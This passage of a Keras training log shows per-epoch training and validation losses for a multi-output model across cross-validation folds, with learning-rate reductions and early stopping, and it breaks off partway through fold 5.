- val_output_c_loss: 0.7457 Epoch 2/70 120/120 - 7s - loss: 7.7552 - output_react_loss: 0.8208 - output_bg_ph_loss: 0.9754 - output_ph_loss: 1.1669 - output_mg_c_loss: 0.9870 - output_c_loss: 1.0217 - val_loss: 6.1518 - val_output_react_loss: 0.7047 - val_output_bg_ph_loss: 0.8679 - val_output_ph_loss: 0.8045 - val_output_mg_c_loss: 0.7560 - val_output_c_loss: 0.6901 Epoch 3/70 120/120 - 7s - loss: 7.1821 - output_react_loss: 0.7753 - output_bg_ph_loss: 0.8991 - output_ph_loss: 1.1080 - output_mg_c_loss: 0.8939 - output_c_loss: 0.9375 - val_loss: 5.6383 - val_output_react_loss: 0.6550 - val_output_bg_ph_loss: 0.7970 - val_output_ph_loss: 0.7564 - val_output_mg_c_loss: 0.6784 - val_output_c_loss: 0.6212 Epoch 4/70 120/120 - 7s - loss: 6.7289 - output_react_loss: 0.7362 - output_bg_ph_loss: 0.8336 - output_ph_loss: 1.0447 - output_mg_c_loss: 0.8225 - output_c_loss: 0.8995 - val_loss: 5.2977 - val_output_react_loss: 0.6334 - val_output_bg_ph_loss: 0.7465 - val_output_ph_loss: 0.6968 - val_output_mg_c_loss: 0.6302 - val_output_c_loss: 0.5807 Epoch 5/70 120/120 - 7s - loss: 6.4910 - output_react_loss: 0.7190 - output_bg_ph_loss: 0.8051 - output_ph_loss: 0.9983 - output_mg_c_loss: 0.7908 - output_c_loss: 0.8628 - val_loss: 5.2019 - val_output_react_loss: 0.6135 - val_output_bg_ph_loss: 0.7289 - val_output_ph_loss: 0.6880 - val_output_mg_c_loss: 0.6272 - val_output_c_loss: 0.5747 Epoch 6/70 120/120 - 7s - loss: 6.1684 - output_react_loss: 0.6897 - output_bg_ph_loss: 0.7635 - output_ph_loss: 0.9449 - output_mg_c_loss: 0.7468 - output_c_loss: 0.8238 - val_loss: 5.0363 - val_output_react_loss: 0.5998 - val_output_bg_ph_loss: 0.7134 - val_output_ph_loss: 0.6642 - val_output_mg_c_loss: 0.5947 - val_output_c_loss: 0.5563 Epoch 7/70 120/120 - 7s - loss: 6.2087 - output_react_loss: 0.6861 - output_bg_ph_loss: 0.7609 - output_ph_loss: 0.9620 - output_mg_c_loss: 0.7543 - output_c_loss: 0.8441 - val_loss: 5.0750 - val_output_react_loss: 0.6034 - val_output_bg_ph_loss: 0.7020 - val_output_ph_loss: 0.6790 - val_output_mg_c_loss: 0.6142 - val_output_c_loss: 0.5569 Epoch 8/70 120/120 - 7s - loss: 6.0125 - output_react_loss: 0.6668 - output_bg_ph_loss: 0.7439 - output_ph_loss: 0.9281 - output_mg_c_loss: 0.7213 - output_c_loss: 0.8205 - val_loss: 4.8987 - val_output_react_loss: 0.5870 - val_output_bg_ph_loss: 0.6898 - val_output_ph_loss: 0.6503 - val_output_mg_c_loss: 0.5736 - val_output_c_loss: 0.5477 Epoch 9/70 120/120 - 7s - loss: 5.6743 - output_react_loss: 0.6340 - output_bg_ph_loss: 0.6979 - output_ph_loss: 0.8804 - output_mg_c_loss: 0.6772 - output_c_loss: 0.7756 - val_loss: 4.8440 - val_output_react_loss: 0.5786 - val_output_bg_ph_loss: 0.6811 - val_output_ph_loss: 0.6374 - val_output_mg_c_loss: 0.5707 - val_output_c_loss: 0.5456 Epoch 10/70 120/120 - 7s - loss: 5.8360 - output_react_loss: 0.6532 - output_bg_ph_loss: 0.6981 - output_ph_loss: 0.9233 - output_mg_c_loss: 0.6985 - output_c_loss: 0.8132 - val_loss: 4.8348 - val_output_react_loss: 0.5791 - val_output_bg_ph_loss: 0.6826 - val_output_ph_loss: 0.6364 - val_output_mg_c_loss: 0.5702 - val_output_c_loss: 0.5346 Epoch 11/70 120/120 - 7s - loss: 5.5673 - output_react_loss: 0.6177 - output_bg_ph_loss: 0.6746 - output_ph_loss: 0.8888 - output_mg_c_loss: 0.6622 - output_c_loss: 0.7693 - val_loss: 4.7333 - val_output_react_loss: 0.5694 - val_output_bg_ph_loss: 0.6625 - val_output_ph_loss: 0.6226 - val_output_mg_c_loss: 0.5564 - val_output_c_loss: 0.5340 Epoch 12/70 120/120 - 7s - loss: 5.5214 - output_react_loss: 0.6199 - output_bg_ph_loss: 0.6635 - output_ph_loss: 0.8765 - output_mg_c_loss: 0.6528 - output_c_loss: 0.7725 - val_loss: 4.8059 - val_output_react_loss: 0.5627 - val_output_bg_ph_loss: 0.6731 - val_output_ph_loss: 0.6371 - val_output_mg_c_loss: 0.5799 - val_output_c_loss: 0.5374 Epoch 13/70 120/120 - 7s - loss: 5.3062 - output_react_loss: 0.5977 - output_bg_ph_loss: 0.6392 - output_ph_loss: 0.8410 - output_mg_c_loss: 0.6230 - output_c_loss: 0.7454 - val_loss: 4.7326 - val_output_react_loss: 0.5585 - val_output_bg_ph_loss: 0.6626 - val_output_ph_loss: 0.6208 - val_output_mg_c_loss: 0.5681 - val_output_c_loss: 0.5334 Epoch 14/70 120/120 - 7s - loss: 5.2454 - output_react_loss: 0.5833 - output_bg_ph_loss: 0.6234 - output_ph_loss: 0.8391 - output_mg_c_loss: 0.6176 - output_c_loss: 0.7576 - val_loss: 4.7426 - val_output_react_loss: 0.5517 - val_output_bg_ph_loss: 0.6679 - val_output_ph_loss: 0.6287 - val_output_mg_c_loss: 0.5702 - val_output_c_loss: 0.5343 Epoch 15/70 120/120 - 7s - loss: 5.2718 - output_react_loss: 0.5885 - output_bg_ph_loss: 0.6244 - output_ph_loss: 0.8461 - output_mg_c_loss: 0.6164 - output_c_loss: 0.7671 - val_loss: 4.6895 - val_output_react_loss: 0.5530 - val_output_bg_ph_loss: 0.6561 - val_output_ph_loss: 0.6196 - val_output_mg_c_loss: 0.5603 - val_output_c_loss: 0.5311 Epoch 16/70 120/120 - 8s - loss: 5.0568 - output_react_loss: 0.5666 - output_bg_ph_loss: 0.6042 - output_ph_loss: 0.8064 - output_mg_c_loss: 0.5917 - output_c_loss: 0.7252 - val_loss: 4.7229 - val_output_react_loss: 0.5603 - val_output_bg_ph_loss: 0.6592 - val_output_ph_loss: 0.6172 - val_output_mg_c_loss: 0.5682 - val_output_c_loss: 0.5303 Epoch 17/70 120/120 - 7s - loss: 5.1108 - output_react_loss: 0.5676 - output_bg_ph_loss: 0.6043 - output_ph_loss: 0.8302 - output_mg_c_loss: 0.5973 - output_c_loss: 0.7422 - val_loss: 4.6748 - val_output_react_loss: 0.5490 - val_output_bg_ph_loss: 0.6577 - val_output_ph_loss: 0.6220 - val_output_mg_c_loss: 0.5537 - val_output_c_loss: 0.5321 Epoch 18/70 120/120 - 7s - loss: 4.8097 - output_react_loss: 0.5327 - output_bg_ph_loss: 0.5670 - output_ph_loss: 0.7759 - output_mg_c_loss: 0.5630 - output_c_loss: 0.7083 - val_loss: 4.6194 - val_output_react_loss: 0.5420 - val_output_bg_ph_loss: 0.6526 - val_output_ph_loss: 0.6067 - val_output_mg_c_loss: 0.5501 - val_output_c_loss: 0.5233 Epoch 19/70 120/120 - 7s - loss: 4.9436 - output_react_loss: 0.5502 - output_bg_ph_loss: 0.5810 - output_ph_loss: 0.8112 - output_mg_c_loss: 0.5720 - output_c_loss: 0.7258 - val_loss: 4.6665 - val_output_react_loss: 0.5566 - val_output_bg_ph_loss: 0.6545 - val_output_ph_loss: 0.6094 - val_output_mg_c_loss: 0.5533 - val_output_c_loss: 0.5283 Epoch 20/70 120/120 - 7s - loss: 4.7871 - output_react_loss: 0.5290 - output_bg_ph_loss: 0.5616 - output_ph_loss: 0.7727 - output_mg_c_loss: 0.5615 - output_c_loss: 0.7103 - val_loss: 4.7063 - val_output_react_loss: 0.5511 - val_output_bg_ph_loss: 0.6634 - val_output_ph_loss: 0.6159 - val_output_mg_c_loss: 0.5631 - val_output_c_loss: 0.5352 Epoch 21/70 120/120 - 7s - loss: 4.7750 - output_react_loss: 0.5299 - output_bg_ph_loss: 0.5580 - output_ph_loss: 0.7771 - output_mg_c_loss: 0.5590 - output_c_loss: 0.7043 - val_loss: 4.6158 - val_output_react_loss: 0.5455 - val_output_bg_ph_loss: 0.6464 - val_output_ph_loss: 0.6079 - val_output_mg_c_loss: 0.5490 - val_output_c_loss: 0.5261 Epoch 22/70 120/120 - 7s - loss: 4.7371 - output_react_loss: 0.5229 - output_bg_ph_loss: 0.5488 - output_ph_loss: 0.7858 - output_mg_c_loss: 0.5513 - output_c_loss: 0.7053 - val_loss: 4.5994 - val_output_react_loss: 0.5457 - val_output_bg_ph_loss: 0.6436 - val_output_ph_loss: 0.6061 - val_output_mg_c_loss: 0.5459 - val_output_c_loss: 0.5226 Epoch 23/70 120/120 - 7s - loss: 4.7746 - output_react_loss: 0.5235 - output_bg_ph_loss: 0.5509 - output_ph_loss: 0.8001 - output_mg_c_loss: 0.5547 - output_c_loss: 0.7163 - val_loss: 4.6118 - val_output_react_loss: 0.5429 - val_output_bg_ph_loss: 0.6521 - val_output_ph_loss: 0.6054 - val_output_mg_c_loss: 0.5466 - val_output_c_loss: 0.5232 Epoch 24/70 120/120 - 7s - loss: 4.6363 - output_react_loss: 0.5124 - output_bg_ph_loss: 0.5353 - output_ph_loss: 0.7584 - output_mg_c_loss: 0.5383 - output_c_loss: 0.7059 - val_loss: 4.6217 - val_output_react_loss: 0.5505 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.6066 - val_output_mg_c_loss: 0.5480 - val_output_c_loss: 0.5262 Epoch 25/70 120/120 - 7s - loss: 4.4305 - output_react_loss: 0.4869 - output_bg_ph_loss: 0.5133 - output_ph_loss: 0.7272 - output_mg_c_loss: 0.5132 - output_c_loss: 0.6766 - val_loss: 4.6304 - val_output_react_loss: 0.5475 - val_output_bg_ph_loss: 0.6499 - val_output_ph_loss: 0.6096 - val_output_mg_c_loss: 0.5507 - val_output_c_loss: 0.5246 Epoch 26/70 120/120 - 7s - loss: 4.6461 - output_react_loss: 0.5099 - output_bg_ph_loss: 0.5270 - output_ph_loss: 0.7788 - output_mg_c_loss: 0.5405 - output_c_loss: 0.7126 - val_loss: 4.6105 - val_output_react_loss: 0.5441 - val_output_bg_ph_loss: 0.6435 - val_output_ph_loss: 0.6049 - val_output_mg_c_loss: 0.5536 - val_output_c_loss: 0.5232 Epoch 27/70 Epoch 00027: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513. 120/120 - 7s - loss: 4.4508 - output_react_loss: 0.4865 - output_bg_ph_loss: 0.5154 - output_ph_loss: 0.7393 - output_mg_c_loss: 0.5180 - output_c_loss: 0.6718 - val_loss: 4.6236 - val_output_react_loss: 0.5541 - val_output_bg_ph_loss: 0.6424 - val_output_ph_loss: 0.6128 - val_output_mg_c_loss: 0.5445 - val_output_c_loss: 0.5288 Epoch 28/70 120/120 - 7s - loss: 4.3974 - output_react_loss: 0.4782 - output_bg_ph_loss: 0.4922 - output_ph_loss: 0.7485 - output_mg_c_loss: 0.5110 - output_c_loss: 0.6862 - val_loss: 4.5277 - val_output_react_loss: 0.5392 - val_output_bg_ph_loss: 0.6349 - val_output_ph_loss: 0.5967 - val_output_mg_c_loss: 0.5348 - val_output_c_loss: 0.5133 Epoch 29/70 120/120 - 7s - loss: 4.1935 - output_react_loss: 0.4579 - output_bg_ph_loss: 0.4789 - output_ph_loss: 0.7002 - output_mg_c_loss: 0.4823 - output_c_loss: 0.6551 - val_loss: 4.5286 - val_output_react_loss: 0.5375 - val_output_bg_ph_loss: 0.6356 - val_output_ph_loss: 0.5949 - val_output_mg_c_loss: 0.5363 - val_output_c_loss: 0.5150 Epoch 30/70 120/120 - 7s - loss: 4.3716 - output_react_loss: 0.4728 - output_bg_ph_loss: 0.4947 - output_ph_loss: 0.7368 - output_mg_c_loss: 0.5026 - output_c_loss: 0.6945 - val_loss: 4.5206 - val_output_react_loss: 0.5371 - val_output_bg_ph_loss: 0.6341 - val_output_ph_loss: 0.5940 - val_output_mg_c_loss: 0.5356 - val_output_c_loss: 0.5130 Epoch 31/70 120/120 - 7s - loss: 4.2824 - output_react_loss: 0.4612 - output_bg_ph_loss: 0.4877 - output_ph_loss: 0.7328 - output_mg_c_loss: 0.4905 - output_c_loss: 0.6709 - val_loss: 4.5204 - val_output_react_loss: 0.5369 - val_output_bg_ph_loss: 0.6333 - val_output_ph_loss: 0.5948 - val_output_mg_c_loss: 0.5358 - val_output_c_loss: 0.5135 Epoch 32/70 120/120 - 8s - loss: 4.2224 - output_react_loss: 0.4580 - output_bg_ph_loss: 0.4723 - output_ph_loss: 0.7178 - output_mg_c_loss: 0.4889 - output_c_loss: 0.6664 - val_loss: 4.5124 - val_output_react_loss: 0.5360 - val_output_bg_ph_loss: 0.6326 - val_output_ph_loss: 0.5944 - val_output_mg_c_loss: 0.5338 - val_output_c_loss: 0.5131 Epoch 33/70 120/120 - 7s - loss: 4.1067 - output_react_loss: 0.4443 - output_bg_ph_loss: 0.4693 - output_ph_loss: 0.6871 - output_mg_c_loss: 0.4744 - output_c_loss: 0.6434 - val_loss: 4.5215 - val_output_react_loss: 0.5368 - val_output_bg_ph_loss: 0.6340 - val_output_ph_loss: 0.5943 - val_output_mg_c_loss: 0.5360 - val_output_c_loss: 0.5134 Epoch 34/70 120/120 - 7s - loss: 4.3377 - output_react_loss: 0.4678 - output_bg_ph_loss: 0.4812 - output_ph_loss: 0.7438 - output_mg_c_loss: 0.5043 - output_c_loss: 0.6874 - val_loss: 4.5075 - val_output_react_loss: 0.5353 - val_output_bg_ph_loss: 0.6321 - val_output_ph_loss: 0.5934 - val_output_mg_c_loss: 0.5333 - val_output_c_loss: 0.5126 Epoch 35/70 120/120 - 7s - loss: 4.1034 - output_react_loss: 0.4508 - output_bg_ph_loss: 0.4664 - output_ph_loss: 0.6807 - output_mg_c_loss: 0.4690 - output_c_loss: 0.6503 - val_loss: 4.5226 - val_output_react_loss: 0.5381 - val_output_bg_ph_loss: 0.6328 - val_output_ph_loss: 0.5957 - val_output_mg_c_loss: 0.5356 - val_output_c_loss: 0.5138 Epoch 36/70 120/120 - 7s - loss: 4.0701 - output_react_loss: 0.4452 - output_bg_ph_loss: 0.4590 - output_ph_loss: 0.6904 - output_mg_c_loss: 0.4662 - output_c_loss: 0.6389 - val_loss: 4.5138 - val_output_react_loss: 0.5366 - val_output_bg_ph_loss: 0.6316 - val_output_ph_loss: 0.5939 - val_output_mg_c_loss: 0.5347 - val_output_c_loss: 0.5142 Epoch 37/70 120/120 - 7s - loss: 4.2783 - output_react_loss: 0.4575 - output_bg_ph_loss: 0.4774 - output_ph_loss: 0.7434 - output_mg_c_loss: 0.4942 - output_c_loss: 0.6767 - val_loss: 4.5133 - val_output_react_loss: 0.5361 - val_output_bg_ph_loss: 0.6321 - val_output_ph_loss: 0.5935 - val_output_mg_c_loss: 0.5350 - val_output_c_loss: 0.5134 Epoch 38/70 120/120 - 7s - loss: 4.2156 - output_react_loss: 0.4574 - output_bg_ph_loss: 0.4655 - output_ph_loss: 0.7182 - output_mg_c_loss: 0.4864 - output_c_loss: 0.6788 - val_loss: 4.5101 - val_output_react_loss: 0.5351 - val_output_bg_ph_loss: 0.6316 - val_output_ph_loss: 0.5937 - val_output_mg_c_loss: 0.5346 - val_output_c_loss: 0.5137 Epoch 39/70 Epoch 00039: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05. 120/120 - 7s - loss: 4.2040 - output_react_loss: 0.4570 - output_bg_ph_loss: 0.4739 - output_ph_loss: 0.7226 - output_mg_c_loss: 0.4780 - output_c_loss: 0.6635 - val_loss: 4.5177 - val_output_react_loss: 0.5363 - val_output_bg_ph_loss: 0.6332 - val_output_ph_loss: 0.5938 - val_output_mg_c_loss: 0.5352 - val_output_c_loss: 0.5148 Epoch 40/70 120/120 - 8s - loss: 4.0879 - output_react_loss: 0.4409 - output_bg_ph_loss: 0.4636 - output_ph_loss: 0.6944 - output_mg_c_loss: 0.4676 - output_c_loss: 0.6492 - val_loss: 4.5065 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6315 - val_output_ph_loss: 0.5929 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5133 Epoch 41/70 120/120 - 7s - loss: 4.1062 - output_react_loss: 0.4419 - output_bg_ph_loss: 0.4591 - output_ph_loss: 0.6918 - output_mg_c_loss: 0.4792 - output_c_loss: 0.6540 - val_loss: 4.5043 - val_output_react_loss: 0.5353 - val_output_bg_ph_loss: 0.6310 - val_output_ph_loss: 0.5925 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5130 Epoch 42/70 120/120 - 7s - loss: 4.1679 - output_react_loss: 0.4495 - output_bg_ph_loss: 0.4657 - output_ph_loss: 0.7240 - output_mg_c_loss: 0.4719 - output_c_loss: 0.6699 - val_loss: 4.5072 - val_output_react_loss: 0.5356 - val_output_bg_ph_loss: 0.6314 - val_output_ph_loss: 0.5929 - val_output_mg_c_loss: 0.5335 - val_output_c_loss: 0.5132 Epoch 43/70 120/120 - 7s - loss: 4.0446 - output_react_loss: 0.4416 - output_bg_ph_loss: 0.4594 - output_ph_loss: 0.6716 - output_mg_c_loss: 0.4668 - output_c_loss: 0.6375 - val_loss: 4.5044 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6309 - val_output_ph_loss: 0.5925 - val_output_mg_c_loss: 0.5328 - val_output_c_loss: 0.5135 Epoch 44/70 120/120 - 7s - loss: 4.1571 - output_react_loss: 0.4519 - output_bg_ph_loss: 0.4633 - output_ph_loss: 0.7157 - output_mg_c_loss: 0.4768 - output_c_loss: 0.6574 - val_loss: 4.5038 - val_output_react_loss: 0.5351 - val_output_bg_ph_loss: 0.6309 - val_output_ph_loss: 0.5927 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5129 Epoch 45/70 120/120 - 7s - loss: 4.1190 - output_react_loss: 0.4399 - output_bg_ph_loss: 0.4596 - output_ph_loss: 0.7120 - output_mg_c_loss: 0.4726 - output_c_loss: 0.6628 - val_loss: 4.5050 - val_output_react_loss: 0.5356 - val_output_bg_ph_loss: 0.6307 - val_output_ph_loss: 0.5928 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5133 Epoch 46/70 120/120 - 7s - loss: 4.1904 - output_react_loss: 0.4496 - output_bg_ph_loss: 0.4695 - output_ph_loss: 0.7201 - output_mg_c_loss: 0.4816 - output_c_loss: 0.6688 - val_loss: 4.5056 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6312 - val_output_ph_loss: 0.5926 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5127 Epoch 47/70 120/120 - 7s - loss: 4.2432 - output_react_loss: 0.4606 - output_bg_ph_loss: 0.4745 - output_ph_loss: 0.7277 - output_mg_c_loss: 0.4862 - output_c_loss: 0.6731 - val_loss: 4.5064 - val_output_react_loss: 0.5358 - val_output_bg_ph_loss: 0.6310 - val_output_ph_loss: 0.5928 - val_output_mg_c_loss: 0.5336 - val_output_c_loss: 0.5129 Epoch 48/70 120/120 - 7s - loss: 3.9354 - output_react_loss: 0.4218 - output_bg_ph_loss: 0.4448 - output_ph_loss: 0.6639 - output_mg_c_loss: 0.4552 - output_c_loss: 0.6279 - val_loss: 4.5060 - val_output_react_loss: 0.5354 - val_output_bg_ph_loss: 0.6312 - val_output_ph_loss: 0.5927 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5136 Epoch 49/70 Epoch 00049: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06. 120/120 - 7s - loss: 4.1410 - output_react_loss: 0.4473 - output_bg_ph_loss: 0.4629 - output_ph_loss: 0.7069 - output_mg_c_loss: 0.4758 - output_c_loss: 0.6621 - val_loss: 4.5057 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5130 Epoch 50/70 120/120 - 7s - loss: 4.0535 - output_react_loss: 0.4465 - output_bg_ph_loss: 0.4524 - output_ph_loss: 0.6915 - output_mg_c_loss: 0.4633 - output_c_loss: 0.6376 - val_loss: 4.5066 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6312 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5132 Epoch 51/70 120/120 - 7s - loss: 4.1506 - output_react_loss: 0.4464 - output_bg_ph_loss: 0.4638 - output_ph_loss: 0.7097 - output_mg_c_loss: 0.4765 - output_c_loss: 0.6675 - val_loss: 4.5061 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5133 Epoch 52/70 120/120 - 7s - loss: 4.1188 - output_react_loss: 0.4439 - output_bg_ph_loss: 0.4648 - output_ph_loss: 0.6971 - output_mg_c_loss: 0.4718 - output_c_loss: 0.6607 - val_loss: 4.5057 - val_output_react_loss: 0.5356 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5132 Epoch 53/70 120/120 - 7s - loss: 4.1722 - output_react_loss: 0.4500 - output_bg_ph_loss: 0.4646 - output_ph_loss: 0.7128 - output_mg_c_loss: 0.4809 - output_c_loss: 0.6685 - val_loss: 4.5053 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6310 - val_output_ph_loss: 0.5929 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5132 Epoch 54/70 Restoring model weights from the end of the best epoch. Epoch 00054: ReduceLROnPlateau reducing learning rate to 1.0000001111620805e-07. 120/120 - 7s - loss: 4.1012 - output_react_loss: 0.4457 - output_bg_ph_loss: 0.4583 - output_ph_loss: 0.7053 - output_mg_c_loss: 0.4713 - output_c_loss: 0.6452 - val_loss: 4.5060 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5333 - val_output_c_loss: 0.5132 Epoch 00054: early stopping FOLD: 5 Epoch 1/70 120/120 - 9s - loss: 8.9648 - output_react_loss: 0.9398 - output_bg_ph_loss: 1.1487 - output_ph_loss: 1.3266 - output_mg_c_loss: 1.1680 - output_c_loss: 1.1252 - val_loss: 6.6904 - val_output_react_loss: 0.7636 - val_output_bg_ph_loss: 0.9520 - val_output_ph_loss: 0.8665 - val_output_mg_c_loss: 0.8282 - val_output_c_loss: 0.7363 Epoch 2/70 120/120 - 7s - loss: 7.6799 - output_react_loss: 0.8094 - output_bg_ph_loss: 0.9836 - output_ph_loss: 1.1459 - output_mg_c_loss: 0.9768 - output_c_loss: 0.9945 - val_loss: 6.0158 - val_output_react_loss: 0.7012 - val_output_bg_ph_loss: 0.8336 - val_output_ph_loss: 0.7948 - val_output_mg_c_loss: 0.7338 - val_output_c_loss: 0.6837 Epoch 3/70 120/120 - 7s - loss: 7.2897 - output_react_loss: 0.7810 - output_bg_ph_loss: 0.9158 - output_ph_loss: 1.1226 - output_mg_c_loss: 0.9056 - output_c_loss: 0.9623 - val_loss: 5.5349 - val_output_react_loss: 0.6677 - val_output_bg_ph_loss: 0.7701 - val_output_ph_loss: 0.7270 - val_output_mg_c_loss: 0.6577 - val_output_c_loss: 0.6171 Epoch 4/70 120/120 - 7s - loss: 6.7767 - output_react_loss: 0.7432 - output_bg_ph_loss: 0.8430 - output_ph_loss: 1.0224 - output_mg_c_loss: 0.8412 - output_c_loss: 0.8995 - val_loss: 5.2177 - val_output_react_loss: 0.6327 - val_output_bg_ph_loss: 0.7224 - val_output_ph_loss: 0.6922 - val_output_mg_c_loss: 0.6148 - val_output_c_loss: 0.5860 Epoch 5/70 120/120 - 7s - loss: 6.5807 - output_react_loss: 0.7253 - output_bg_ph_loss: 0.8228 - output_ph_loss: 1.0071 - output_mg_c_loss: 0.8073 - output_c_loss: 0.8630 - val_loss: 5.0784 - val_output_react_loss: 0.6096 - val_output_bg_ph_loss: 0.7026 - val_output_ph_loss: 0.6803 - val_output_mg_c_loss: 0.5995 - val_output_c_loss: 0.5747 Epoch 6/70 120/120 - 7s - loss: 6.3022 - output_react_loss: 0.6965 - output_bg_ph_loss: 0.7873 - output_ph_loss: 0.9594 - output_mg_c_loss: 0.7747 - output_c_loss: 0.8259 - val_loss: 4.9445 - val_output_react_loss: 0.5908 - val_output_bg_ph_loss: 0.6836 - val_output_ph_loss: 0.6573 - val_output_mg_c_loss: 0.5859 - val_output_c_loss: 0.5667 Epoch 7/70 120/120 - 8s - loss: 6.1569 - output_react_loss: 0.6795 - output_bg_ph_loss: 0.7661 - output_ph_loss: 0.9470 - output_mg_c_loss: 0.7474 - output_c_loss: 0.8241 - val_loss: 4.9766 - val_output_react_loss: 0.5834 - val_output_bg_ph_loss: 0.7018 - val_output_ph_loss: 0.6614 - val_output_mg_c_loss: 0.5918 - val_output_c_loss: 0.5612 Epoch 8/70 120/120 - 7s - loss: 6.1745 - output_react_loss: 0.6824 - output_bg_ph_loss: 0.7600 - output_ph_loss: 0.9654 - output_mg_c_loss: 0.7405 - output_c_loss: 0.8432 - val_loss: 4.8558 - val_output_react_loss: 0.5759 - val_output_bg_ph_loss: 0.6690 - val_output_ph_loss: 0.6489 - val_output_mg_c_loss: 0.5753 - val_output_c_loss: 0.5665 Epoch 9/70 120/120 - 7s - loss: 5.7238 - output_react_loss: 0.6377 - output_bg_ph_loss: 0.7138 - output_ph_loss: 0.8751 - output_mg_c_loss: 0.6886 - output_c_loss: 0.7685 - val_loss: 4.8555 - val_output_react_loss: 0.5673 - val_output_bg_ph_loss: 0.6788 - val_output_ph_loss: 0.6493 - val_output_mg_c_loss: 0.5792 - val_output_c_loss: 0.5556 Epoch 10/70 120/120 - 7s - loss: 5.7590 - output_react_loss: 0.6336 - output_bg_ph_loss: 0.7089 - output_ph_loss: 0.8894 - output_mg_c_loss: 0.6956 - output_c_loss: 0.7936 - val_loss: 4.7163 - val_output_react_loss: 0.5526 - val_output_bg_ph_loss: 0.6563 - val_output_ph_loss: 0.6365 - val_output_mg_c_loss: 0.5557 - val_output_c_loss: 0.5506 Epoch 11/70 120/120 - 7s - loss: 5.5815 - output_react_loss: 0.6273 - output_bg_ph_loss: 0.6864 - output_ph_loss: 0.8704 - output_mg_c_loss: 0.6616 - output_c_loss: 0.7606 - val_loss: 4.6844 - val_output_react_loss: 0.5585 - val_output_bg_ph_loss: 0.6507 - val_output_ph_loss: 0.6214 - val_output_mg_c_loss: 0.5499 - val_output_c_loss: 0.5449 Epoch 12/70 120/120 - 7s - loss: 5.4826 - output_react_loss: 0.6173 - output_bg_ph_loss: 0.6596 - output_ph_loss: 0.8529 - output_mg_c_loss: 0.6578 - output_c_loss: 0.7603 - val_loss: 4.6554 - val_output_react_loss: 0.5450 - val_output_bg_ph_loss: 0.6512 - val_output_ph_loss: 0.6174 - val_output_mg_c_loss: 0.5547 - val_output_c_loss: 0.5363 Epoch 13/70 120/120 - 7s - loss: 5.3332 - output_react_loss: 0.5912 - output_bg_ph_loss: 0.6540 - output_ph_loss: 0.8383 - output_mg_c_loss: 0.6354 - output_c_loss: 0.7337 - val_loss: 4.6316 - val_output_react_loss: 0.5492 - val_output_bg_ph_loss: 0.6412 - val_output_ph_loss: 0.6162 - val_output_mg_c_loss: 0.5516 - val_output_c_loss: 0.5314 Epoch 14/70 120/120 - 8s - loss: 5.3117 - output_react_loss: 0.5859 - output_bg_ph_loss: 0.6470 - output_ph_loss: 0.8433 - output_mg_c_loss: 0.6317 - output_c_loss: 0.7391 - val_loss: 4.5633 - val_output_react_loss: 0.5350 - val_output_bg_ph_loss: 0.6353 - val_output_ph_loss: 0.6074 - val_output_mg_c_loss: 0.5415 - val_output_c_loss: 0.5322 Epoch 15/70 120/120 - 8s - loss: 5.3218 - output_react_loss: 0.5974 - output_bg_ph_loss: 0.6333 - output_ph_loss: 0.8453 - output_mg_c_loss: 0.6272 - output_c_loss: 0.7607 - val_loss: 4.6204 - val_output_react_loss: 0.5386 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6139 - val_output_mg_c_loss: 0.5522 - val_output_c_loss: 0.5313 Epoch 16/70 120/120 - 7s - loss: 5.2437 - output_react_loss: 0.5836 - output_bg_ph_loss: 0.6251 - output_ph_loss: 0.8358 - output_mg_c_loss: 0.6188 - output_c_loss: 0.7528 - val_loss: 4.5869 - val_output_react_loss: 0.5374 - val_output_bg_ph_loss: 0.6370 - val_output_ph_loss: 0.6171 - val_output_mg_c_loss: 0.5449 - val_output_c_loss: 0.5311 Epoch 17/70 120/120 - 7s - loss: 5.0213 - output_react_loss: 0.5595 - output_bg_ph_loss: 0.5995 - output_ph_loss: 0.8040 - output_mg_c_loss: 0.5927 - output_c_loss: 0.7138 - val_loss: 4.5759 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6397 - val_output_ph_loss: 0.6064 - val_output_mg_c_loss: 0.5432 - val_output_c_loss: 0.5324 Epoch 18/70 120/120 - 7s - loss: 4.8916 - output_react_loss: 0.5412 - output_bg_ph_loss: 0.5869 - output_ph_loss: 0.7755 - output_mg_c_loss: 0.5758 - output_c_loss: 0.7082 - val_loss: 4.5692 - val_output_react_loss: 0.5379 - val_output_bg_ph_loss: 0.6415 - val_output_ph_loss: 0.6044 - val_output_mg_c_loss: 0.5391 - val_output_c_loss: 0.5278 Epoch 19/70 Epoch 00019: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513. 120/120 - 7s - loss: 4.8882 - output_react_loss: 0.5382 - output_bg_ph_loss: 0.5824 - output_ph_loss: 0.7907 - output_mg_c_loss: 0.5734 - output_c_loss: 0.7095 - val_loss: 4.5903 - val_output_react_loss: 0.5373 - val_output_bg_ph_loss: 0.6393 - val_output_ph_loss: 0.6124 - val_output_mg_c_loss: 0.5453 - 